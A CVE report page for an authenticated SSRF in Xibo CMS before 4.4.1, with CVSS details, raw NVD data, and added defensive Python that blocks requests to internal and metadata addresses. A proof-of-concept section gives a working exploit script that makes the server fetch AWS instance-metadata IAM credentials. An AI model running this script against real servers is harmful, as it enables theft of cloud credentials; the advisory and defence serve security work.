Security Vulnerability Report

CVE-2026-42141

Published: 2026-05-12 18:17:24
Last Modified: 2026-05-13 15:43:05

Description

Xibo is an open source digital signage platform with a web content management system and Windows display player software. Prior to 4.4.1, an authenticated Server-Side Request Forgery (SSRF) vulnerability in the Xibo CMS allows users with Library upload permissions to make arbitrary HTTP requests from the CMS server to internal or external network resources. This can be exploited to scan internal infrastructure, access local cloud metadata endpoints (e.g., AWS IMDS), interact with internal services that lack authentication, or exfiltrate data. This vulnerability is fixed in 4.4.1.
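
The server-side check that stops this class of bug, as an added example: this is not Xibo's code and not the change shipped in 4.4.1 (the page does not show that fix). It is a guard for a "fetch media from URL" feature that resolves the user-supplied host itself, requires every returned address to be globally routable, and hands back the vetted IP so the caller connects to that IP with the original Host header rather than re-resolving. The 169.254.169.254 metadata address is link-local and fails the check, as do loopback, RFC 1918 ranges and their IPv4-mapped IPv6 forms. The hostnames and the DEMO_DNS table are constructed for the demonstration so the block runs offline; resolve_system is what production would plug in.

```python
"""Added example, not code from Xibo or from the 4.4.1 fix: a URL guard for a
"fetch media from URL" feature that blocks the SSRF pattern described above.

Design: resolve the supplied host ourselves, require *every* returned address
to be globally routable, and return the vetted IP so the caller connects to it
(sending the original Host header) instead of re-resolving, which closes the
DNS-rebinding window. Redirect targets must be re-vetted the same way.
"""
from __future__ import annotations

import ipaddress
import socket
from typing import Callable, Iterable
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}  # policy knob: widen deliberately, not by default


def resolve_system(host: str) -> list[str]:
    """Production resolver: every A/AAAA record the OS returns for host."""
    return sorted({ai[4][0] for ai in socket.getaddrinfo(host, None)})


def _is_public(addr: ipaddress.IPv4Address | ipaddress.IPv6Address) -> bool:
    # ::ffff:a.b.c.d wraps an IPv4 address; judge the inner address.
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    # is_global is False for loopback, RFC 1918, link-local (which includes
    # 169.254.169.254), CGNAT, documentation and reserved ranges. Multicast and
    # unspecified are excluded explicitly because older Pythons report some
    # IPv6 multicast as global.
    return addr.is_global and not (addr.is_multicast or addr.is_unspecified)


def vet_fetch_url(url: str,
                  resolve: Callable[[str], Iterable[str]] = resolve_system) -> tuple[str, str]:
    """Return (hostname, pinned_ip) if url may be fetched; raise ValueError otherwise."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        raise ValueError(f"scheme not allowed: {parts.scheme!r}")
    if parts.username or parts.password:
        raise ValueError("credentials in URL not allowed")
    host = parts.hostname
    if not host:
        raise ValueError("missing host")
    port = parts.port or (443 if scheme == "https" else 80)
    if port not in ALLOWED_PORTS:
        raise ValueError(f"port not allowed: {port}")
    # A literal IP (dotted quad or bracketed IPv6) is judged directly. Anything
    # else, including odd encodings such as 0x7f000001 or 2130706433, goes to
    # the resolver, which canonicalises it; no hand-written parser is needed.
    try:
        addrs = [ipaddress.ip_address(host)]
    except ValueError:
        addrs = [ipaddress.ip_address(a) for a in resolve(host)]
    if not addrs:
        raise ValueError("host did not resolve")
    # All records must pass: a name answering with one public and one internal
    # address is how round-robin or rebinding slips past a single-lookup check.
    bad = [str(a) for a in addrs if not _is_public(a)]
    if bad:
        raise ValueError(f"host resolves to non-public address(es): {bad}")
    return host, str(addrs[0])


# Constructed DNS table standing in for the real resolver in this demo.
DEMO_DNS = {
    "cdn.example.com": ["93.184.216.34"],
    "metadata.internal.example": ["169.254.169.254"],
    "rebind.example.net": ["198.41.0.4", "10.0.0.5"],
}


def demo_resolve(host: str) -> list[str]:
    if host not in DEMO_DNS:
        raise ValueError(f"NXDOMAIN: {host}")
    return DEMO_DNS[host]


def classify(url: str) -> str:
    """Demo helper: 'allowed' or 'rejected: <reason>' using the constructed DNS."""
    try:
        vet_fetch_url(url, resolve=demo_resolve)
        return "allowed"
    except ValueError as exc:
        return f"rejected: {exc}"


if __name__ == "__main__":
    for u in (
        "https://cdn.example.com/logo.png",
        "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
        "http://[::ffff:169.254.169.254]/latest/meta-data/",
        "http://metadata.internal.example/",
        "http://rebind.example.net/",
        "http://127.0.0.1:8080/",
        "file:///etc/passwd",
    ):
        print(f"{classify(u):70s} {u}")
```

The caller should open the socket to the returned pinned IP, set the Host header to the returned hostname, disable automatic redirects (or run vet_fetch_url on each Location before following it), and cap response size and timeout. An allowlist of destination hosts is stricter still and is the right choice when the feature only ever needs to reach a known CDN.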

CVSS Details

CVSS Score: 7.7
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
Weakness: CWE-918 (Server-Side Request Forgery)

The vector reads: network-reachable, low complexity, low privileges (any account with Library upload permission), no user interaction, changed scope (the request originates from the CMS server and reaches hosts the attacker could not otherwise address), high confidentiality impact, no integrity or availability impact.

Configurations (Affected Products)

No NVD CPE configuration data available. Affected per the advisory: Xibo CMS < 4.4.1 (fixed in 4.4.1).

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Target URL
TARGET_URL = "http://target-xibo-cms.com"
# Login credentials (any account with Library upload permission)
USERNAME = "attacker"
PASSWORD = "password"
# SSRF payload targeting the AWS instance metadata service
SSRF_PAYLOAD = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"


def exploit_ssrf():
    session = requests.Session()

    # Step 1: Authenticate to get a session cookie
    login_data = {"username": USERNAME, "password": PASSWORD}
    login_resp = session.post(f"{TARGET_URL}/login", data=login_data)
    # requests follows redirects, so a final 200 here does not by itself prove
    # the credentials were accepted; check the landing page if in doubt.
    if login_resp.status_code != 200:
        print("Login failed")
        return
    print("[+] Login successful")

    # Step 2: Send the SSRF request via the Library upload functionality
    # Note: the specific endpoint and parameter name might vary based on version
    upload_headers = {"Content-Type": "application/json"}
    exploit_data = {
        "name": "test_image",
        "url": SSRF_PAYLOAD,  # Vulnerable parameter: fetched server-side
        "isUpload": 1,
    }
    exploit_resp = session.post(
        f"{TARGET_URL}/api/library",
        json=exploit_data,
        headers=upload_headers,
    )
    if exploit_resp.status_code == 200:
        print("[+] SSRF request sent successfully")
        print(f"[+] Response body:\n{exploit_resp.text}")
    else:
        print("[-] Exploit failed")
        print(exploit_resp.text)


if __name__ == "__main__":
    exploit_ssrf()
```

References

https://github.com/xibosignage/xibo-cms/security/advisories/GHSA-fwq8-c4gw-pxmh (vendor security advisory on GitHub; the source of this CVE record)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-42141",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-12T18:17:23.920",
    "lastModified": "2026-05-13T15:43:05.440",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Xibo is an open source digital signage platform with a web content management system and Windows display player software. Prior to 4.4.1, an authenticated Server-Side Request Forgery (SSRF) vulnerability in the Xibo CMS allows users with Library upload permissions to make arbitrary HTTP requests from the CMS server to internal or external network resources. This can be exploited to scan internal infrastructure, access local cloud metadata endpoints (e.g., AWS IMDS), interact with internal services that lack authentication, or exfiltrate data. This vulnerability is fixed in 4.4.1."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N",
            "baseScore": 7.7,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.1,
          "impactScore": 4.0
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-918"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/xibosignage/xibo-cms/security/advisories/GHSA-fwq8-c4gw-pxmh",
        "source": "[email protected]"
      }
    ]
  }
}
```